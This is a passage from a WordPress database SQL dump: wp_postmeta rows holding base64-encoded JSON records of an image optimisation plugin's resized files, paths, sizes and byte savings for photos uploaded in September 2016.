sImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MzAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU5NiwidGltZSI6MTQ4MzU2NDMwMywiaWQiOjE3Njh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MzAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY2OSwidGltZSI6MTQ4MzU2NDMwNiwiaWQiOjE3Njh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MzAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MzAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMTQsInRpbWUiOjE0ODM1NjQzMTAsImlkIjoxNzY4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzMwLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTczMC05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzMwLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6MzkwLCJ0aW1lIjoxNDgzNTY0MzEzLCJpZCI6MTc2OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29220, 1767, 'wpfc_optimisation_reduction', '26439'); 
INSERT INTO `wp_postmeta` VALUES (29221, 1767, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjQzMTgsImlkIjoiMTc2NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzI1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4OTUsInRpbWUiOjE0ODM1NjQzMjEsImlkIjoxNzY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyNS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyNS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTcyNS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzAwOSwidGltZSI6MTQ4MzU2NDMyNiwiaWQiOjE3Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzI1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNjczLCJ0aW1lIjoxNDgzNTY0MzMyLCJpZCI6MTc2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTMxNTIsInRpbWUiOjE0ODM1NjQzMzYsImlkIjoxNzY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyNS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyNS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTcyNS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjE1LCJ0aW1lIjoxNDgzNTY0MzQwLCJpZCI6MTc2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxNywidGltZSI6MTQ4MzU2NDM0MywiaWQiOjE3Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzI1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1OTAsInRpbWUiOjE0ODM1NjQzNDYsImlkIjoxNzY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyNS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyNS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTcyNS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTk2NywidGltZSI6MTQ4MzU2NDM1MCwiaWQiOjE3Njd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjUtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQyMiwidGltZSI6MTQ4MzU2NDM1MywiaWQiOjE3Njd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjUtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU2MiwidGltZSI6MTQ4MzU2NDM1NiwiaWQiOjE3Njd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY0NSwidGltZSI6MTQ4MzU2NDM2MCwiaWQiOjE3Njd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjUtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjUtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMDksInRpbWUiOjE0ODM1NjQzNjMsImlkIjoxNzY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzI1LTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyNS05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzI1LTkweDkwLmpwZyIsInJlZHVjdGlvbiI6MzgzLCJ0aW1lIjoxNDgzNTY0MzY2LCJpZCI6MTc2N31d'); 
INSERT INTO `wp_postmeta` VALUES (29222, 1766, 'wpfc_optimisation_reduction', '26650'); 
INSERT INTO `wp_postmeta` VALUES (29223, 1766, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzIwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzIwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjQzNzEsImlkIjoiMTc2NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzIwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzIwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzIwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MDQsInRpbWUiOjE0ODM1NjQzNzQsImlkIjoxNzY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyMC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyMC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTcyMC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzA5NywidGltZSI6MTQ4MzU2NDM3OCwiaWQiOjE3NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzIwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzIwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzIwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNzg4LCJ0aW1lIjoxNDgzNTY0MzgxLCJpZCI6MTc2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzIwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTMyMzYsInRpbWUiOjE0ODM1NjQzODUsImlkIjoxNzY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyMC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyMC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTcyMC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjE2LCJ0aW1lIjoxNDgzNTY0Mzg4LCJpZCI6MTc2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUzMSwidGltZSI6MTQ4MzU2NDM5MiwiaWQiOjE3NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzIwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzIwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzIwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1OTYsInRpbWUiOjE0ODM1NjQzOTUsImlkIjoxNzY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyMC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTcyMC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTcyMC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg5MywidGltZSI6MTQ4MzU2NDM5OCwiaWQiOjE3NjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxNywidGltZSI6MTQ4MzU2NDQwMSwiaWQiOjE3NjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU0MiwidGltZSI6MTQ4MzU2NDQwNSwiaWQiOjE3NjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03MjAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03MjAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY0OCwidGltZSI6M